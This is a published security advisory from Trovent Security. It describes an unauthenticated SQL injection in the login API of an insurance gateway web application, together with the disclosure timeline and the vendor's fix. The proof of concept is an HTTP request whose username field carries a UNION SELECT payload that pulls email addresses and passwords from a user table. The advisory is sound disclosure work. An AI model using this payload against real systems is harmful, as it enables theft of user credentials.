Security Advisory 2004-01

SQL Injection in Login API Endpoint

Overview

Advisory ID: TRSA-2004-01
Advisory version: 1.0
Advisory status: Public
Advisory URL: https://trovent.io/security-advisory-2004-01
Affected product: Web application https://production.gateway.insure
Affected version: N/A
Vendor: Hepstar Financial Services (Pty) Ltd, https://www.hepstar.com
Credits: Trovent Security GmbH, Stefan Pietsch

Detailed Description

Trovent Security GmbH discovered an SQL injection vulnerability in a web
application of Hepstar. An attacker is able to execute SQL commands without authentication. It is possible to read data from all tables of the database.

Severity: Critical
CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVE ID: N/A
CWE ID: CWE-89

Note: Trovent Security GmbH did not perform a penetration test of the web application.

Proof of Concept

Sample HTTP request used to verify the vulnerability:

POST /authentication/rest/login HTTP/1.1
Host: production.gateway.insure
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Connection: close
username=x'%20UNION%20SELECT%20SUBSTRING(GROUP_CONCAT(email,'|',password),1,1024),11,11,12345,11,11%20FROM%20security_user--%20-&password=y

Solution / Workaround

Application source code has to be modified to fix the vulnerability.

History

2020-04-17: Vulnerability found, vendor contacted
2020-04-20: Vendor replied, asking for details
2020-04-21: Vulnerability details reported to vendor
2020-04-22: Trovent verified remediation of the vulnerability
2020-05-16: Advisory published